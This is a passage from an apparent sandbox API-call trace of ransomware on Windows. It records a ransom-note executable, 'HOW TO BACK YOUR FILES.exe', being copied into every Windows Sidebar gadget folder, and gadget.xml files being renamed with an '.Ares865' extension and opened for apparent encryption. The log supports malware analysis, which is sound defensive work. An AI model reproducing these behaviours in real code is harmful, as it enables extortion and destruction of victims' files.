FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.602] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.618] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.618] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x563c2a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x563c2a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.618] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.618] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.618] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml.Ares865") returned 80 [0061.618] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0061.663] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0061.663] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1990) returned 1 [0061.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0061.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0061.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0061.663] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0061.664] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.664] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0061.664] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xad0, lpName=0x0) returned 0x118 [0061.666] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xad0) returned 0x190000 [0061.691] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0061.700] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.701] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0061.702] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0061.714] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js" [0061.717] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js" [0061.718] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.718] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.737] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.737] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x564cd420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x564cd420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.737] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.737] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.738] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css" [0061.738] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css" [0061.738] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.738] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.741] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.741] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x564cd420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x564cd420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.741] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.742] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.742] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget" [0061.742] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget" [0061.742] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.742] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.873] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.873] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56624080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56624080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.873] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.873] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.874] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images" [0061.874] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images" [0061.874] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.874] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.880] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.880] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56624080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56624080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.880] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.880] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.880] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop" [0061.880] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop" [0061.880] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.881] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\on_desktop\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.884] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.884] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5664a1e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5664a1e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.884] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.884] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.884] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar" [0061.884] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar" [0061.884] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.884] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\images\\in_sidebar\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.888] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.888] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5664a1e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5664a1e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.888] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.888] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.888] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US" [0061.888] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US" [0061.888] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.888] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.893] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.893] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5664a1e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5664a1e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.894] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.894] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.894] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml.Ares865") returned 82 [0061.894] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0061.896] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0061.896] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=989) returned 1 [0061.896] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0061.896] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0061.896] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0061.896] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0061.898] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0061.898] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0061.898] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x118 [0061.900] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x190000 [0061.903] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0061.904] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0061.904] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0061.904] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0061.904] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js" [0061.905] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js" [0061.905] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.905] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\js\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.908] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.908] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x56670340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56670340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.908] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.908] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.909] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css" [0061.909] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css" [0061.909] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.909] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.912] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.913] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x56670340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56670340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.913] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.913] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.913] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget" [0061.913] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget" [0061.913] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.913] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\how to back your files.exe"), bFailIfExists=1) returned 